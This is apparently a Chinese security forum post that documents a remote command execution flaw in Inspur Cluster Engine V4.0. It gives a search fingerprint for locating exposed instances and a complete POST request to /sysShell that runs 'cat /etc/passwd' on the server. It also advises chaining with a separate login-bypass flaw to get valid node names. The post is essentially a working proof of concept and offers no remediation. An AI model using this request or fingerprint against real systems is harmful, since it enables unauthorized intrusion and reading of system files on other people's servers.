InspurClusterEngineV4.0 sysShell 任意命令执行漏洞

# InspurClusterEngineV4.0 sysShell 任意命令执行漏洞 ## 漏洞描述 InspurClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限 ## 漏洞影响 InspurC...

InspurClusterEngineV4.0 sysShell 任意命令执行漏洞

漏洞描述

InspurClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限

漏洞影响

InspurClusterEngineV4.0

网络测绘

title="TSCEV4.0"

漏洞复现

登录页面如下

img

发送请求包

POST /sysShell HTTP/1.1
Host: 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: lang=cn
Cache-Control: max-age=0
Content-Length: 42

op=doPlease&node=cu01&command=cat /etc/passwd

img

注意参数 node 中的 cu01 需要为shell集群中的存在主机

img

这里可以配合任意用户登录漏洞查看主机名

  • 发表于 2024-07-12 18:46:17
  • 阅读 ( 2209 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计